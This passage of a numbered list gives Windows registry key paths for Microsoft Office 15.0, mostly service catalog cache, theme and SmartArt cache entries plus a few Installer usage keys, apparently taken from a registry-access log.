1001. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata",
1002. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\DefaultFolderRelativePath",
1003. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\KeyTip",
1004. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\Type",
1005. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails",
1006. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url16x16",
1007. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url32x32",
1008. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url48x48",
1009. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP",
1010. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Capabilities",
1011. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ConnectMechanism",
1012. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\IsManaged",
1013. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\IsRemovable",
1014. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceOwner",
1015. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\SortOrder",
1016. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\SupportsMultiple",
1017. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\CapabilitiesMetadata",
1018. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Description",
1019. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Name",
1020. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceId",
1021. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceUrl",
1022. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata",
1023. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata\\KeyTip",
1024. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata\\Type",
1025. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails",
1026. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
1027. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
1028. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
1029. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER",
1030. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Capabilities",
1031. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ConnectMechanism",
1032. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\IsManaged",
1033. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\IsRemovable",
1034. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceOwner",
1035. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\SortOrder",
1036. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\SupportsMultiple",
1037. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\CapabilitiesMetadata",
1038. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Description",
1039. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Name",
1040. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceId",
1041. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceUrl",
1042. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata",
1043. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\HideIfEmpty",
1044. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\KeyTip",
1045. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\Type",
1046. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails",
1047. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url16x16",
1048. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url32x32",
1049. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url48x48",
1050. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE",
1051. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Capabilities",
1052. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ConnectMechanism",
1053. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\IsManaged",
1054. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\IsRemovable",
1055. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceOwner",
1056. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\SortOrder",
1057. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\SupportsMultiple",
1058. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\CapabilitiesMetadata",
1059. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Description",
1060. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Name",
1061. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceId",
1062. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceUrl",
1063. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata",
1064. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\DefaultCreateRelativePath",
1065. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\DefaultFolderRelativePath",
1066. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\KeyTip",
1067. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\RegularExpression",
1068. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\Type",
1069. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails",
1070. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url16x16",
1071. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url32x32",
1072. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url48x48",
1073. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT",
1074. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Capabilities",
1075. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ConnectMechanism",
1076. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\IsManaged",
1077. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\IsRemovable",
1078. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceOwner",
1079. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\SortOrder",
1080. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\SupportsMultiple",
1081. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Description",
1082. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Name",
1083. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceId",
1084. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceUrl",
1085. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails",
1086. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url16x16",
1087. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url32x32",
1088. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url48x48",
1089. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE",
1090. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Capabilities",
1091. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ConnectMechanism",
1092. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\IsManaged",
1093. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\IsRemovable",
1094. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceOwner",
1095. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\SortOrder",
1096. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\SupportsMultiple",
1097. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Description",
1098. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Name",
1099. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceId",
1100. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceUrl",
1101. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails",
1102. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url16x16",
1103. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url32x32",
1104. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url48x48",
1105. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE",
1106. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Capabilities",
1107. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ConnectMechanism",
1108. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\IsManaged",
1109. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\IsRemovable",
1110. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceOwner",
1111. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\SortOrder",
1112. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\SupportsMultiple",
1113. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\CapabilitiesMetadata",
1114. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Description",
1115. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Name",
1116. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceId",
1117. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceUrl",
1118. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata",
1119. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\DefaultCreateRelativePath",
1120. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\DefaultFolderRelativePath",
1121. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\KeyTip",
1122. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\RegularExpression",
1123. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\Type",
1124. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails",
1125. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url16x16",
1126. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url32x32",
1127. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url48x48",
1128. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\Trusted Documents\\LastPurgeTime",
1129. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005119110000000000000000F01FEC\\Usage\\ProductFiles",
1130. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\General\\LastAutoSavePurgeTime",
1131. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\122462C\\13EFF63",
1132. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109F100A0C00000000000F01FEC\\Usage\\SpellingAndGrammarFiles_3082",
1133. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109F100C0400000000000F01FEC\\Usage\\SpellingAndGrammarFiles_1036",
1134. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109F10090400000000000F01FEC\\Usage\\SpellingAndGrammarFiles_1033",
1135. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Licensing\\09D07EFC505F4D9CBFD5ACE3217F6654",
1136. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03090434",
1137. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457503",
1138. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033917",
1139. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457510",
1140. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001105",
1141. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033919",
1142. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457464",
1143. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457475",
1144. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033925",
1145. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033927",
1146. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457485",
1147. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033937",
1148. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001106",
1149. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033921",
1150. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457444",
1151. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03090430",
1152. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457515",
1153. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457496",
1154. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033929",
1155. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457491",
1156. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001103",
1157. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001104",
1158. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328925",
1159. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328919",
1160. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328884",
1161. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328951",
1162. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328998",
1163. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328990",
1164. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328986",
1165. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328972",
1166. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328940",
1167. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328935",
1168. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328975",
1169. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328932",
1170. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328908",
1171. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328916",
1172. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328983",
1173. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM02835233",
1174. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM01840907",
